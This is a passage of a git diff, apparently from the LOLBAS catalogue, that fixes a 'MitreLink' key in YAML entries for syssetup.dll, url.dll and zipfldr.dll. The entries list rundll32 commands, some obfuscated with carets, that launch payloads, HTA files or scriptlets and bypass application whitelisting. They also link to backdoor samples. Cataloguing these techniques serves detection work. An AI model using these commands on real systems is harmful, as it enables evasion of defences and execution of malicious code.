2018-05-25 -Commands: - - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf - Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification (Note May pop an error window). - Category: AWL Bypass - Privileges: User - MitreID: T1085 - MitreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf - Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. - UseCase: Load an executable payload. - Category: Execute - Privileges: User - MitreID: T1085 - MitreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\syssetup.dll - - Path: c:\windows\syswow64\syssetup.dll -Code_Sample: - - Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf - - Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct - - Code: https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415 -Detection: - - IOC: -Resources: - - Link: https://twitter.com/pabraeken/status/994392481927258113 - - Link: https://twitter.com/harr0ey/status/975350238184697857 - - Link: https://twitter.com/bohops/status/975549525938135040 - - Link: https://windows10dll.nirsoft.net/syssetup_dll.html -Acknowledgement: - - Person: Pierre-Alexandre Braeken (Execute) - Handle: '@pabraeken' - - Person: Matt harr0ey (Execute) - Handle: '@harr0ey' - - Person: Jimmy (Scriptlet) - Handle: '@bohops' ---- +--- +Name: Syssetup.dll +Description: Windows NT System Setup +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf + Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). + UseCase: Run local or remote script(let) code through INF file specification (Note May pop an error window). + Category: AWL Bypass + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf + Description: Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. + UseCase: Load an executable payload. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\syssetup.dll + - Path: c:\windows\syswow64\syssetup.dll +Code_Sample: + - Code: https://raw.githubusercontent.com/huntresslabs/evading-autoruns/master/shady.inf + - Code: https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba#file-backdoor-minimalist-sct + - Code: https://gist.github.com/homjxi0e/87b29da0d4f504cb675bb1140a931415 +Detection: + - IOC: +Resources: + - Link: https://twitter.com/pabraeken/status/994392481927258113 + - Link: https://twitter.com/harr0ey/status/975350238184697857 + - Link: https://twitter.com/bohops/status/975549525938135040 + - Link: https://windows10dll.nirsoft.net/syssetup_dll.html +Acknowledgement: + - Person: Pierre-Alexandre Braeken (Execute) + Handle: '@pabraeken' + - Person: Matt harr0ey (Execute) + Handle: '@harr0ey' + - Person: Jimmy (Scriptlet) + Handle: '@bohops' +--- diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index 5b82185..d8164b6 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml @@ -1,78 +1,78 @@ ---- -Name: Url.dll -Description: Internet Shortcut Shell Extension DLL. -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta" - Description: Launch a HTML application payload by calling OpenURL. - UseCase: Invoke an HTML Application via mshta.exe (Default Handler). - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url" - Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - UseCase: Load an executable payload by calling a .url file with or without quotes. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e - Description: Launch an executable by calling OpenURL. - UseCase: Load an executable payload by specifying the file protocol handler (obfuscated). - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe - Description: Launch an executable by calling FileProtocolHandler. - UseCase: Launch an executable. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e - Description: Launch an executable by calling FileProtocolHandler. - UseCase: Load an executable payload by specifying the file protocol handler (obfuscated). - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta - Description: Launch a HTML application payload by calling FileProtocolHandler. - UseCase: Invoke an HTML Application via mshta.exe (Default Handler). - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\url.dll - - Path: c:\windows\syswow64\url.dll -Code_Sample: - - Code: -Detection: - - IOC: -Resources: - - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ - - Link: https://twitter.com/DissectMalware/status/995348436353470465 - - Link: https://twitter.com/bohops/status/974043815655956481 - - Link: https://twitter.com/yeyint_mth/status/997355558070927360 - - Link: https://twitter.com/Hexacorn/status/974063407321223168 - - Link: https://windows10dll.nirsoft.net/url_dll.html -Acknowledgement: - - Person: Adam (OpenURL) - Handle: '@hexacorn' - - Person: Jimmy (OpenURL) - Handle: '@bohops' - - Person: Malwrologist (FileProtocolHandler - HTA) - Handle: '@DissectMalware' - - Person: r0lan (Obfuscation) - Handle: '@r0lan' ---- +--- +Name: Url.dll +Description: Internet Shortcut Shell Extension DLL. +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta" + Description: Launch a HTML application payload by calling OpenURL. + UseCase: Invoke an HTML Application via mshta.exe (Default Handler). + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.url" + Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. + UseCase: Load an executable payload by calling a .url file with or without quotes. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e + Description: Launch an executable by calling OpenURL. + UseCase: Load an executable payload by specifying the file protocol handler (obfuscated). + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe url.dll,FileProtocolHandler calc.exe + Description: Launch an executable by calling FileProtocolHandler. + UseCase: Launch an executable. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e + Description: Launch an executable by calling FileProtocolHandler. + UseCase: Load an executable payload by specifying the file protocol handler (obfuscated). + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta + Description: Launch a HTML application payload by calling FileProtocolHandler. + UseCase: Invoke an HTML Application via mshta.exe (Default Handler). + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\url.dll + - Path: c:\windows\syswow64\url.dll +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ + - Link: https://twitter.com/DissectMalware/status/995348436353470465 + - Link: https://twitter.com/bohops/status/974043815655956481 + - Link: https://twitter.com/yeyint_mth/status/997355558070927360 + - Link: https://twitter.com/Hexacorn/status/974063407321223168 + - Link: https://windows10dll.nirsoft.net/url_dll.html +Acknowledgement: + - Person: Adam (OpenURL) + Handle: '@hexacorn' + - Person: Jimmy (OpenURL) + Handle: '@bohops' + - Person: Malwrologist (FileProtocolHandler - HTA) + Handle: '@DissectMalware' + - Person: r0lan (Obfuscation) + Handle: '@r0lan' +--- diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml index a22a8a7..d72ecf1 100644 --- a/yml/OSLibraries/Zipfldr.yml +++ b/yml/OSLibraries/Zipfldr.yml @@ -1,39 +1,39 @@ ---- -Name: Zipfldr.dll -Description: Compressed Folder library -Author: -Created: 2018-05-25 -Commands: - - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe - Description: Launch an executable payload by calling RouteTheCall. - UseCase: Launch an executable. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows - - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e - Description: Launch an executable payload by calling RouteTheCall (obfuscated). - UseCase: Launch an executable. - Category: Execute - Privileges: User - MitreID: T1085 - MItreLink: https://attack.mitre.org/wiki/Technique/T1085 - OperatingSystem: Windows -Full_Path: - - Path: c:\windows\system32\zipfldr.dll - - Path: c:\windows\syswow64\zipfldr.dll -Code_Sample: - - Code: -Detection: - - IOC: -Resources: - - Link: https://twitter.com/moriarty_meng/status/977848311603380224 - - Link: https://twitter.com/bohops/status/997896811904929792 - - Link: https://windows10dll.nirsoft.net/zipfldr_dll.html -Acknowledgement: - - Person: Moriarty (Execution) - Handle: '@moriarty_meng' - - Person: r0lan (Obfuscation) - Handle: '@r0lan' ---- +--- +Name: Zipfldr.dll +Description: Compressed Folder library +Author: +Created: 2018-05-25 +Commands: + - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe + Description: Launch an executable payload by calling RouteTheCall. + UseCase: Launch an executable. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows + - Command: rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e + Description: Launch an executable payload by calling RouteTheCall (obfuscated). + UseCase: Launch an executable. + Category: Execute + Privileges: User + MitreID: T1085 + MitreLink: https://attack.mitre.org/wiki/Technique/T1085 + OperatingSystem: Windows +Full_Path: + - Path: c:\windows\system32\zipfldr.dll + - Path: c:\windows\syswow64\zipfldr.dll +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://twitter.com/moriarty_meng/status/977848311603380224 + - Link: https://twitter.com/bohops/status/997896811904929792 + - Link: https://windows10dll.nirsoft.net/zipfldr_dll.html +Acknowledgement: + - Person: Moriarty (Execution) + Handle: '@moriarty_meng' + - Person: r0lan (Obfuscation) + Handle: '@r0lan' +---